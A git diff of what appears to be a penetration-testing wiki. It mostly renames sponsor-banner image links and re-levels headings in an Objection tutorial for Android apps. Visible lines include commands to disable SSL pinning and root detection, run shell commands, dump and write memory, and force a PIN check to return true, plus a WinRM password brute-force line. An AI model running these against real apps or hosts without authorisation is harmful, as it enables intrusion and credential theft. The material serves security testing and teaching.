diff --git a/.gitbook/assets/image (1) (1) (2).png b/.gitbook/assets/image (1) (1) (2).png new file mode 100644 index 00000000..847a8c4e Binary files /dev/null and b/.gitbook/assets/image (1) (1) (2).png differ diff --git a/.gitbook/assets/image (1) (1).png b/.gitbook/assets/image (1) (1).png index 847a8c4e..261b7c00 100644 Binary files a/.gitbook/assets/image (1) (1).png and b/.gitbook/assets/image (1) (1).png differ diff --git a/.gitbook/assets/image (1).png b/.gitbook/assets/image (1).png index 261b7c00..78abb789 100644 Binary files a/.gitbook/assets/image (1).png and b/.gitbook/assets/image (1).png differ diff --git a/.gitbook/assets/image (2) (1) (2).png b/.gitbook/assets/image (2) (1) (2).png new file mode 100644 index 00000000..0f8a8673 Binary files /dev/null and b/.gitbook/assets/image (2) (1) (2).png differ diff --git a/.gitbook/assets/image (2) (1).png b/.gitbook/assets/image (2) (1).png index 0f8a8673..ce61d494 100644 Binary files a/.gitbook/assets/image (2) (1).png and b/.gitbook/assets/image (2) (1).png differ diff --git a/.gitbook/assets/image (2).png b/.gitbook/assets/image (2).png index ce61d494..14a78557 100644 Binary files a/.gitbook/assets/image (2).png and b/.gitbook/assets/image (2).png differ diff --git a/.gitbook/assets/image (70) (1).png b/.gitbook/assets/image (70) (1).png new file mode 100644 index 00000000..1978dd55 Binary files /dev/null and b/.gitbook/assets/image (70) (1).png differ diff --git a/.gitbook/assets/image (70).png b/.gitbook/assets/image (70).png index 1978dd55..54935ced 100644 Binary files a/.gitbook/assets/image (70).png and b/.gitbook/assets/image (70).png differ diff --git a/.gitbook/assets/image (73) (1).png b/.gitbook/assets/image (73) (1).png new file mode 100644 index 00000000..74a3163d Binary files /dev/null and b/.gitbook/assets/image (73) (1).png differ diff --git a/.gitbook/assets/image (73).png b/.gitbook/assets/image (73).png index 74a3163d..619cc354 100644 Binary files a/.gitbook/assets/image (73).png and b/.gitbook/assets/image (73).png differ diff --git a/.gitbook/assets/image (78) (1).png b/.gitbook/assets/image (78) (1).png new file mode 100644 index 00000000..7e07102b Binary files /dev/null and b/.gitbook/assets/image (78) (1).png differ diff --git a/.gitbook/assets/image (78).png b/.gitbook/assets/image (78).png index 7e07102b..e7036425 100644 Binary files a/.gitbook/assets/image (78).png and b/.gitbook/assets/image (78).png differ diff --git a/.gitbook/assets/image (8) (2).png b/.gitbook/assets/image (8) (2).png new file mode 100644 index 00000000..fa756fb5 Binary files /dev/null and b/.gitbook/assets/image (8) (2).png differ diff --git a/.gitbook/assets/image (8).png b/.gitbook/assets/image (8).png index fa756fb5..1982f5d0 100644 Binary files a/.gitbook/assets/image (8).png and b/.gitbook/assets/image (8).png differ diff --git a/.gitbook/assets/image (81) (1).png b/.gitbook/assets/image (81) (1).png new file mode 100644 index 00000000..169a0842 Binary files /dev/null and b/.gitbook/assets/image (81) (1).png differ diff --git a/.gitbook/assets/image (81).png b/.gitbook/assets/image (81).png index 169a0842..37ab1a51 100644 Binary files a/.gitbook/assets/image (81).png and b/.gitbook/assets/image (81).png differ diff --git a/.gitbook/assets/image.png b/.gitbook/assets/image.png index 78abb789..64b0c5b0 100644 Binary files a/.gitbook/assets/image.png and b/.gitbook/assets/image.png differ diff --git a/SUMMARY.md b/SUMMARY.md index 2c7bcf7a..6a6f4d7f 100644 --- a/SUMMARY.md +++ b/SUMMARY.md @@ -159,6 +159,7 @@ * [AD Certificates](windows-hardening/active-directory-methodology/ad-certificates.md) * [Account Persistence](windows-hardening/active-directory-methodology/ad-certificates/account-persistence.md) * [Domain Escalation](windows-hardening/active-directory-methodology/ad-certificates/domain-escalation.md) + * [Domain Persistence](windows-hardening/active-directory-methodology/ad-certificates/domain-persistence.md) * [Certificate Theft](windows-hardening/active-directory-methodology/ad-certificates/certificate-theft.md) * [AD information in printers](windows-hardening/active-directory-methodology/ad-information-in-printers.md) * [ASREPRoast](windows-hardening/active-directory-methodology/asreproast.md) diff --git a/forensics/basic-forensic-methodology/linux-forensics.md b/forensics/basic-forensic-methodology/linux-forensics.md index 5d8f1d28..6714850d 100644 --- a/forensics/basic-forensic-methodology/linux-forensics.md +++ b/forensics/basic-forensic-methodology/linux-forensics.md @@ -1,7 +1,7 @@ # Linux Forensics {% hint style="danger" %} -![](../../.gitbook/assets/image.png) +![](<../../.gitbook/assets/image (1).png>) \ Use [**Trickest**](https://trickest.io/) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\ @@ -168,7 +168,7 @@ ThisisTheMasterSecret ``` {% hint style="danger" %} -![](../../.gitbook/assets/image.png) +![](<../../.gitbook/assets/image (1).png>) \ Use [**Trickest**](https://trickest.io/) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\ @@ -233,7 +233,7 @@ find /sbin/ –exec rpm -qf {} \; | grep "is not" ``` {% hint style="danger" %} -![](../../.gitbook/assets/image.png) +![](<../../.gitbook/assets/image (1).png>) \ Use [**Trickest**](https://trickest.io/) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\ @@ -376,7 +376,7 @@ usbrip ids search --pid 0002 --vid 0e0f #Search for pid AND vid More examples and info inside the github: [https://github.com/snovvcrash/usbrip](https://github.com/snovvcrash/usbrip) {% hint style="danger" %} -![](../../.gitbook/assets/image.png) +![](<../../.gitbook/assets/image (1).png>) \ Use [**Trickest**](https://trickest.io/) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\ @@ -466,7 +466,7 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) {% hint style="danger" %} -![](../../.gitbook/assets/image.png) +![](<../../.gitbook/assets/image (1).png>) \ Use [**Trickest**](https://trickest.io/) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\ diff --git a/generic-methodologies-and-resources/brute-force.md b/generic-methodologies-and-resources/brute-force.md index f09534b0..40a2292e 100644 --- a/generic-methodologies-and-resources/brute-force.md +++ b/generic-methodologies-and-resources/brute-force.md @@ -1,7 +1,7 @@ # Brute Force - CheatSheet {% hint style="danger" %} -![](../.gitbook/assets/image.png) +![](<../.gitbook/assets/image (1).png>) \ Use [**Trickest**](https://trickest.io/) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\ @@ -84,7 +84,7 @@ python3 cupp.py -h * [**https://crackstation.net/crackstation-wordlist-password-cracking-dictionary.htm**](https://crackstation.net/crackstation-wordlist-password-cracking-dictionary.htm) {% hint style="danger" %} -![](../.gitbook/assets/image.png) +![](<../.gitbook/assets/image (1).png>) \ Use [**Trickest**](https://trickest.io/) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\ @@ -441,7 +441,7 @@ crackmapexec winrm -d -u usernames.txt -p passwords.txt ``` {% hint style="danger" %} -![](../.gitbook/assets/image.png) +![](<../.gitbook/assets/image (1).png>) \ Use [**Trickest**](https://trickest.io/) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\ @@ -641,7 +641,7 @@ crackpkcs12 -d /usr/share/wordlists/rockyou.txt ./cert.pfx ``` {% hint style="danger" %} -![](../.gitbook/assets/image.png) +![](<../.gitbook/assets/image (1).png>) \ Use [**Trickest**](https://trickest.io/) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\ @@ -808,7 +808,7 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) {% hint style="danger" %} -![](../.gitbook/assets/image.png) +![](<../.gitbook/assets/image (1).png>) \ Use [**Trickest**](https://trickest.io/) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\ diff --git a/generic-methodologies-and-resources/python/README.md b/generic-methodologies-and-resources/python/README.md index b44165c3..051cd226 100644 --- a/generic-methodologies-and-resources/python/README.md +++ b/generic-methodologies-and-resources/python/README.md @@ -1,7 +1,7 @@ # Python Sandbox Escape & Pyscript {% hint style="danger" %} -![](../../.gitbook/assets/image.png) +![](<../../.gitbook/assets/image (1).png>) \ Use [**Trickest**](https://trickest.io/) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\ @@ -51,7 +51,7 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) {% hint style="danger" %} -![](../../.gitbook/assets/image.png) +![](<../../.gitbook/assets/image (1).png>) \ Use [**Trickest**](https://trickest.io/) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\ diff --git a/generic-methodologies-and-resources/python/bypass-python-sandboxes/README.md b/generic-methodologies-and-resources/python/bypass-python-sandboxes/README.md index 90ed5627..ec167af6 100644 --- a/generic-methodologies-and-resources/python/bypass-python-sandboxes/README.md +++ b/generic-methodologies-and-resources/python/bypass-python-sandboxes/README.md @@ -1,7 +1,7 @@ # Bypass Python sandboxes {% hint style="danger" %} -![](../../../.gitbook/assets/image.png) +![](<../../../.gitbook/assets/image (1).png>) \ Use [**Trickest**](https://trickest.io/) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\ @@ -322,7 +322,7 @@ with (a as b): ``` {% hint style="danger" %} -![](../../../.gitbook/assets/image.png) +![](<../../../.gitbook/assets/image (1).png>) \ Use [**Trickest**](https://trickest.io/) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\ @@ -710,7 +710,7 @@ You can check the output of this script in this page: {% endcontent-ref %} {% hint style="danger" %} -![](../../../.gitbook/assets/image.png) +![](<../../../.gitbook/assets/image (1).png>) \ Use [**Trickest**](https://trickest.io/) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\ @@ -1118,7 +1118,7 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) {% hint style="danger" %} -![](../../../.gitbook/assets/image.png) +![](<../../../.gitbook/assets/image (1).png>) \ Use [**Trickest**](https://trickest.io/) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\ diff --git a/generic-methodologies-and-resources/python/venv.md b/generic-methodologies-and-resources/python/venv.md index ca990ac7..790417ac 100644 --- a/generic-methodologies-and-resources/python/venv.md +++ b/generic-methodologies-and-resources/python/venv.md @@ -1,7 +1,7 @@ # venv {% hint style="danger" %} -![](../../.gitbook/assets/image.png) +![](<../../.gitbook/assets/image (1).png>) \ Use [**Trickest**](https://trickest.io/) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\ @@ -62,7 +62,7 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) {% hint style="danger" %} -![](../../.gitbook/assets/image.png) +![](<../../.gitbook/assets/image (1).png>) \ Use [**Trickest**](https://trickest.io/) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\ diff --git a/generic-methodologies-and-resources/python/web-requests.md b/generic-methodologies-and-resources/python/web-requests.md index a13f0bf2..46334aac 100644 --- a/generic-methodologies-and-resources/python/web-requests.md +++ b/generic-methodologies-and-resources/python/web-requests.md @@ -1,7 +1,7 @@ # Web Requests {% hint style="danger" %} -![](../../.gitbook/assets/image.png) +![](<../../.gitbook/assets/image (1).png>) \ Use [**Trickest**](https://trickest.io/) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\ @@ -142,7 +142,7 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) {% hint style="danger" %} -![](../../.gitbook/assets/image.png) +![](<../../.gitbook/assets/image (1).png>) \ Use [**Trickest**](https://trickest.io/) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\ diff --git a/generic-methodologies-and-resources/search-exploits.md b/generic-methodologies-and-resources/search-exploits.md index c9d79151..9c9e0729 100644 --- a/generic-methodologies-and-resources/search-exploits.md +++ b/generic-methodologies-and-resources/search-exploits.md @@ -1,7 +1,7 @@ # Search Exploits {% hint style="danger" %} -![](../.gitbook/assets/image.png) +![](<../.gitbook/assets/image (1).png>) \ Use [**Trickest**](https://trickest.io/) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\ @@ -85,7 +85,7 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) {% hint style="danger" %} -![](../.gitbook/assets/image.png) +![](<../.gitbook/assets/image (1).png>) \ Use [**Trickest**](https://trickest.io/) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\ diff --git a/linux-hardening/privilege-escalation/docker-breakout/README.md b/linux-hardening/privilege-escalation/docker-breakout/README.md index 492f6cea..a2216061 100644 --- a/linux-hardening/privilege-escalation/docker-breakout/README.md +++ b/linux-hardening/privilege-escalation/docker-breakout/README.md @@ -1,7 +1,7 @@ # Docker Basics & Breakout {% hint style="danger" %} -![](../../../.gitbook/assets/image.png) +![](<../../../.gitbook/assets/image (1).png>) \ Use [**Trickest**](https://trickest.io/) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\ @@ -124,7 +124,7 @@ tar -zcvf private_keys_backup.tar.gz ~/.docker/trust/private When I changed Docker host, I had to move the root keys and repository keys to operate from the new host. {% hint style="danger" %} -![](../../../.gitbook/assets/image.png) +![](<../../../.gitbook/assets/image (1).png>) \ Use [**Trickest**](https://trickest.io/) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\ @@ -254,7 +254,7 @@ docker run -it --security-opt=no-new-privileges:true nonewpriv For more **`--security-opt`** options check: [https://docs.docker.com/engine/reference/run/#security-configuration](https://docs.docker.com/engine/reference/run/#security-configuration) {% hint style="danger" %} -![](../../../.gitbook/assets/image.png) +![](<../../../.gitbook/assets/image (1).png>) \ Use [**Trickest**](https://trickest.io/) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\ @@ -397,7 +397,7 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) {% hint style="danger" %} -![](../../../.gitbook/assets/image.png) +![](<../../../.gitbook/assets/image (1).png>) \ Use [**Trickest**](https://trickest.io/) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\ diff --git a/linux-hardening/useful-linux-commands/README.md b/linux-hardening/useful-linux-commands/README.md index 947aeed7..54553cf8 100644 --- a/linux-hardening/useful-linux-commands/README.md +++ b/linux-hardening/useful-linux-commands/README.md @@ -1,7 +1,7 @@ # Useful Linux Commands {% hint style="danger" %} -![](../../.gitbook/assets/image.png) +![](<../../.gitbook/assets/image (1).png>) \ Use [**Trickest**](https://trickest.io/) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\ @@ -148,7 +148,7 @@ sudo chattr -i file.txt #Remove the bit so you can delete it ``` {% hint style="danger" %} -![](../../.gitbook/assets/image.png) +![](<../../.gitbook/assets/image (1).png>) \ Use [**Trickest**](https://trickest.io/) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\ @@ -327,7 +327,7 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) {% hint style="danger" %} -![](../../.gitbook/assets/image.png) +![](<../../.gitbook/assets/image (1).png>) \ Use [**Trickest**](https://trickest.io/) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\ diff --git a/mobile-pentesting/android-app-pentesting/README.md b/mobile-pentesting/android-app-pentesting/README.md index 9558b48b..5bf00826 100644 --- a/mobile-pentesting/android-app-pentesting/README.md +++ b/mobile-pentesting/android-app-pentesting/README.md @@ -1,7 +1,7 @@ # Android Applications Pentesting {% hint style="danger" %} -![](../../.gitbook/assets/image.png) +![](<../../.gitbook/assets/image (1).png>) \ Use [**Trickest**](https://trickest.io/) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\ @@ -63,7 +63,7 @@ adb pull /data/app/com.android.insecurebankv2- Jnf8pNgwy3QA_U5f-n_4jQ==/base.apk ``` {% hint style="danger" %} -![](../../.gitbook/assets/image.png) +![](<../../.gitbook/assets/image (1).png>) \ Use [**Trickest**](https://trickest.io/) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\ @@ -246,7 +246,7 @@ An application may contain secrets (API keys, passwords, hidden urls, subdomains {% endcontent-ref %} {% hint style="danger" %} -![](../../.gitbook/assets/image.png) +![](<../../.gitbook/assets/image (1).png>) \ Use [**Trickest**](https://trickest.io/) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\ @@ -496,7 +496,7 @@ Probably you know about this kind of vulnerabilities from the Web. You have to b * [**Secure Flag** in cookies](../../pentesting-web/hacking-with-cookies/#cookies-flags) {% hint style="danger" %} -![](../../.gitbook/assets/image.png) +![](<../../.gitbook/assets/image (1).png>) \ Use [**Trickest**](https://trickest.io/) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\ @@ -687,7 +687,7 @@ python androwarn.py -i my_application_to_be_analyzed.apk -r html -v 3 ### [MARA Framework](https://github.com/xtiankisutsa/MARA\_Framework) -![](<../../.gitbook/assets/image (81).png>) +![](<../../.gitbook/assets/image (81) (1).png>) **MARA** is a **M**obile **A**pplication **R**everse engineering and **A**nalysis Framework. It is a tool that puts together commonly used mobile application reverse engineering and analysis tools, to assist in testing mobile applications against the OWASP mobile security threats. Its objective is to make this task easier and friendlier to mobile application developers and security professionals. @@ -705,7 +705,7 @@ It is able to: Useful to detect malware: [https://koodous.com/](https://koodous.com) {% hint style="danger" %} -![](../../.gitbook/assets/image.png) +![](<../../.gitbook/assets/image (1).png>) \ Use [**Trickest**](https://trickest.io/) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\ @@ -802,7 +802,7 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) {% hint style="danger" %} -![](../../.gitbook/assets/image.png) +![](<../../.gitbook/assets/image (1).png>) \ Use [**Trickest**](https://trickest.io/) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\ diff --git a/mobile-pentesting/android-app-pentesting/frida-tutorial/objection-tutorial.md b/mobile-pentesting/android-app-pentesting/frida-tutorial/objection-tutorial.md index 9e9fe788..2e32bf17 100644 --- a/mobile-pentesting/android-app-pentesting/frida-tutorial/objection-tutorial.md +++ b/mobile-pentesting/android-app-pentesting/frida-tutorial/objection-tutorial.md @@ -1,4 +1,4 @@ - +# Objection Tutorial
@@ -16,8 +16,7 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
- -# **Introduction** +## **Introduction** [![objection](https://github.com/sensepost/objection/raw/master/images/objection.png)](https://github.com/sensepost/objection) @@ -27,11 +26,11 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) **Note:** This is not some form of jailbreak / root bypass. By using `objection`, you are still limited by all of the restrictions imposed by the applicable sandbox you are facing. -## Resume +### Resume The **goal** of **objection** is let the user call the **main actions that offers Frida**. **Otherwise**, the user will need to create a **single script for every application** that he wants to test. -# Tutorial +## Tutorial For this tutorial I am going to use the APK that you can download here: @@ -39,13 +38,13 @@ For this tutorial I am going to use the APK that you can download here: Or from its [original repository ](https://github.com/asvid/FridaApp)(download app-release.apk) -## Installation +### Installation ``` pip3 install objection ``` -## Connection +### Connection Make a **regular ADB conection** and **start** the **frida** server in the device (and check that frida is working in both the client and the server). @@ -55,11 +54,11 @@ If you are using a **rooted device** it is needed to select the application that objection --gadget asvid.github.io.fridaapp explore ``` -## Basic Actions +### Basic Actions Not all possible commands of objections are going to be listed in this tutorial, only the ones that I have found more useful. -### Environment +#### Environment Some interesting information (like passwords or paths) could be find inside the environment. @@ -69,7 +68,7 @@ env ![](<../../../.gitbook/assets/image (64).png>) -### Frida Information +#### Frida Information ``` frida @@ -77,58 +76,58 @@ frida ![](<../../../.gitbook/assets/image (65).png>) -### Upload/Download +#### Upload/Download ```bash file download [] file upload [] ``` -### Import frida script +#### Import frida script ```bash import ``` -### SSLPinning +#### SSLPinning ```bash android sslpinning disable #Attempts to disable SSL Pinning on Android devices. ``` -### Root detection +#### Root detection ```bash android root disable #Attempts to disable root detection on Android devices. android root simulate #Attempts to simulate a rooted Android environment. ``` -### Exec Command +#### Exec Command ```bash android shell_exec whoami ``` -### Screenshots +#### Screenshots ```bash android ui screenshot /tmp/screenshot android ui FLAG_SECURE false #This may enable you to take screenshots using the hardware keys ``` -## Static analysis made Dynamic +### Static analysis made Dynamic In a real application we should know all of the information discovered in this part before using objection thanks to **static analysis**. Anyway, this way maybe you can see **something new** as here you will only have a complete list of classes, methods and exported objects. This is also usefull if somehow you are **unable to get some readable source code** of the app. -### List activities, receivers and services +#### List activities, receivers and services ``` android hooking list activities ``` -![](<../../../.gitbook/assets/image (78).png>) +![](<../../../.gitbook/assets/image (78) (1).png>) ``` android hooking list services @@ -137,15 +136,15 @@ android hooking list receivers Frida will launch an error if none is found -### Getting current activity +#### Getting current activity ``` android hooking get current_activity ``` -![](<../../../.gitbook/assets/image (73).png>) +![](<../../../.gitbook/assets/image (73) (1).png>) -### Search Classes +#### Search Classes Lets start looking for classes inside our application @@ -155,7 +154,7 @@ android hooking search classes asvid.github.io.fridaapp ![](<../../../.gitbook/assets/image (69).png>) -### Search Methods of a class +#### Search Methods of a class Now lets extract the methods inside the class _MainActivity:_ @@ -163,9 +162,9 @@ Now lets extract the methods inside the class _MainActivity:_ android hooking search methods asvid.github.io.fridaapp MainActivity ``` -![](<../../../.gitbook/assets/image (70).png>) +![](<../../../.gitbook/assets/image (70) (1).png>) -### List declared Methods of a class with their parameters +#### List declared Methods of a class with their parameters Lets figure out wich parameters does the methods of the class need: @@ -175,7 +174,7 @@ android hooking list class_methods asvid.github.io.fridaapp.MainActivity ![](<../../../.gitbook/assets/image (79).png>) -### List classes +#### List classes You could also list all the classes that were loaded inside the current applicatoin: @@ -185,9 +184,9 @@ android hooking list classes #List all loaded classes, As the target application This is very useful if you want to **hook the method of a class and you only know the name of the class**. You coul use this function to **search which module owns the class** and then hook its method. -## Hooking being easy +### Hooking being easy -### Hooking (watching) a method +#### Hooking (watching) a method From the [source code](https://github.com/asvid/FridaApp/blob/master/app/src/main/java/asvid/github/io/fridaapp/MainActivity.kt) of the application we know that the **function** _**sum()**_ **from** _**MainActivity**_ is being run **every second**. Lets try to **dump all possible information** each time the function is called (arguments, return value and backtrace): @@ -197,7 +196,7 @@ android hooking watch class_method asvid.github.io.fridaapp.MainActivity.sum --d ![](<../../../.gitbook/assets/image (71).png>) -### Hooking (watching) an entire class +#### Hooking (watching) an entire class Actually I find all the methods of the class MainActivity really interesting, lets **hook them all**. Be careful, this could **crash** an application. @@ -209,7 +208,7 @@ If you play with the application while the class is hooked you will see when **e ![](<../../../.gitbook/assets/image (72).png>) -### Changing boolean return value of a function +#### Changing boolean return value of a function From the source code you can see that the function _checkPin_ gets a _String_ as argument and returns a _boolean_. Lets make the function **always return true**: @@ -219,7 +218,7 @@ Now, If you write anything in the text box for the PIN code you will see tat any ![](<../../../.gitbook/assets/image (77).png>) -## Class instances +### Class instances Search for and print **live instances of a specific Java class**, specified by a fully qualified class name. Out is the result of an attempt at getting a string value for a discovered objection which would typically **contain property values for the object**. @@ -229,7 +228,7 @@ android heap print_instances ![](<../../../.gitbook/assets/image (80).png>) -## Keystore/Intents +### Keystore/Intents You can play with the keystore and intents using: @@ -239,16 +238,16 @@ android intents launch_activity android intent launch_service ``` -## Memory +### Memory -### Dump +#### Dump ```bash memory dump all #Dump all memory memory dump from_base #Dump a part ``` -### List +#### List ``` memory list modules @@ -264,7 +263,7 @@ Lets checks what is frida exporting: ![](<../../../.gitbook/assets/image (68).png>) -### Search/Write +#### Search/Write You can alse search and write inside memory with objection: @@ -273,23 +272,22 @@ memory search "" (--string) (--offsets-only) memory write "
" "" (--string) ``` -## SQLite +### SQLite You cals can use the command `sqlite` to interact with sqlite databases. -## Exit +### Exit ``` exit ``` -# What I miss in Objection +## What I miss in Objection * The hooking methods sometimes crashes the application (this is also because of Frida). * You can't use the instaces of the classes to call functions of the instance. And you can't create new instances of classes and use them to call functions. * There isn't a shortcut (like the one for sslpinnin) to hook all the common crypto methods being used by the application to see cyphered text, plain text, keys, IVs and algorithms used. -
Support HackTricks and get benefits! @@ -305,5 +303,3 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) **Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
- - diff --git a/mobile-pentesting/android-checklist.md b/mobile-pentesting/android-checklist.md index 2b356bd2..ad6e6f29 100644 --- a/mobile-pentesting/android-checklist.md +++ b/mobile-pentesting/android-checklist.md @@ -1,7 +1,7 @@ # Android APK Checklist {% hint style="danger" %} -![](../.gitbook/assets/image.png) +![](<../.gitbook/assets/image (1).png>) \ Use [**Trickest**](https://trickest.io/) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\ @@ -97,7 +97,7 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) {% hint style="danger" %} -![](../.gitbook/assets/image.png) +![](<../.gitbook/assets/image (1).png>) \ Use [**Trickest**](https://trickest.io/) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\ diff --git a/network-services-pentesting/8086-pentesting-influxdb.md b/network-services-pentesting/8086-pentesting-influxdb.md index b28a4a85..890af3cf 100644 --- a/network-services-pentesting/8086-pentesting-influxdb.md +++ b/network-services-pentesting/8086-pentesting-influxdb.md @@ -1,7 +1,7 @@ # 8086 - Pentesting InfluxDB {% hint style="danger" %} -![](../.gitbook/assets/image.png) +![](<../.gitbook/assets/image (1).png>) \ Use [**Trickest**](https://trickest.io/) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\ @@ -164,7 +164,7 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) {% hint style="danger" %} -![](../.gitbook/assets/image.png) +![](<../.gitbook/assets/image (1).png>) \ Use [**Trickest**](https://trickest.io/) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\ diff --git a/network-services-pentesting/pentesting-postgresql.md b/network-services-pentesting/pentesting-postgresql.md index af5d6e0a..bc9c782a 100644 --- a/network-services-pentesting/pentesting-postgresql.md +++ b/network-services-pentesting/pentesting-postgresql.md @@ -1,7 +1,7 @@ # 5432,5433 - Pentesting Postgresql {% hint style="danger" %} -![](../.gitbook/assets/image.png) +![](<../.gitbook/assets/image (1).png>) \ Use [**Trickest**](https://trickest.io/) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\ @@ -99,7 +99,7 @@ ORDER BY 1; ``` {% hint style="danger" %} -![](../.gitbook/assets/image.png) +![](<../.gitbook/assets/image (1).png>) \ Use [**Trickest**](https://trickest.io/) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\ @@ -179,7 +179,7 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) {% hint style="danger" %} -![](../.gitbook/assets/image.png) +![](<../.gitbook/assets/image (1).png>) \ Use [**Trickest**](https://trickest.io/) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\ diff --git a/pentesting-web/command-injection.md b/pentesting-web/command-injection.md index eb3e7b95..e83c6f3d 100644 --- a/pentesting-web/command-injection.md +++ b/pentesting-web/command-injection.md @@ -1,7 +1,7 @@ # Command Injection {% hint style="danger" %} -![](../.gitbook/assets/image.png) +![](<../.gitbook/assets/image (1).png>) \ Use [**Trickest**](https://trickest.io/) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\ @@ -101,7 +101,7 @@ Here are the top 25 parameters that could be vulnerable to code injection and si ``` {% hint style="danger" %} -![](../.gitbook/assets/image.png) +![](<../.gitbook/assets/image (1).png>) \ Use [**Trickest**](https://trickest.io/) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\ @@ -187,7 +187,7 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) {% hint style="danger" %} -![](../.gitbook/assets/image.png) +![](<../.gitbook/assets/image (1).png>) \ Use [**Trickest**](https://trickest.io/) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\ diff --git a/pentesting-web/email-header-injection.md b/pentesting-web/email-header-injection.md index 251673a1..a27ca9f9 100644 --- a/pentesting-web/email-header-injection.md +++ b/pentesting-web/email-header-injection.md @@ -1,7 +1,7 @@ # Email Injections {% hint style="danger" %} -![](../.gitbook/assets/image.png) +![](<../.gitbook/assets/image (1).png>) \ Use [**Trickest**](https://trickest.io/) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\ @@ -118,7 +118,7 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) {% hint style="danger" %} -![](../.gitbook/assets/image.png) +![](<../.gitbook/assets/image (1).png>) \ Use [**Trickest**](https://trickest.io/) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\ diff --git a/pentesting-web/http-request-smuggling/browser-http-request-smuggling.md b/pentesting-web/http-request-smuggling/browser-http-request-smuggling.md index d1e86e78..980befc9 100644 --- a/pentesting-web/http-request-smuggling/browser-http-request-smuggling.md +++ b/pentesting-web/http-request-smuggling/browser-http-request-smuggling.md @@ -285,7 +285,7 @@ In this case the attacker **won't receive the response timeout until he has sen Amazon's Application Load Balancer (ALB) will **stream the data of the connection as needed**, but if it **receives** the **response** to the half request (the timeout) **before** receiving the **body**, it **won't send the body**, so a **Race Condition** must be exploited here: -
+
There's an additional complication when it comes to **exploiting Apache behind ALB** - **both servers** have a default **timeout of 60 seconds**. This leaves an **extremely small time-window** to send the second part of the request. The RC attack was ultimately successful after 66 hours. diff --git a/pentesting-web/nosql-injection.md b/pentesting-web/nosql-injection.md index f50feacb..2f2fff69 100644 --- a/pentesting-web/nosql-injection.md +++ b/pentesting-web/nosql-injection.md @@ -1,7 +1,7 @@ # NoSQL injection {% hint style="danger" %} -![](../.gitbook/assets/image.png) +![](<../.gitbook/assets/image (1).png>) \ Use [**Trickest**](https://trickest.io/) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\ @@ -121,7 +121,7 @@ Using the **$func** operator of the [MongoLite](https://github.com/agentejo/cock ![](<../.gitbook/assets/image (468).png>) {% hint style="danger" %} -![](../.gitbook/assets/image.png) +![](<../.gitbook/assets/image (1).png>) \ Use [**Trickest**](https://trickest.io/) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\ @@ -272,7 +272,7 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) {% hint style="danger" %} -![](../.gitbook/assets/image.png) +![](<../.gitbook/assets/image (1).png>) \ Use [**Trickest**](https://trickest.io/) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\ diff --git a/pentesting-web/race-condition.md 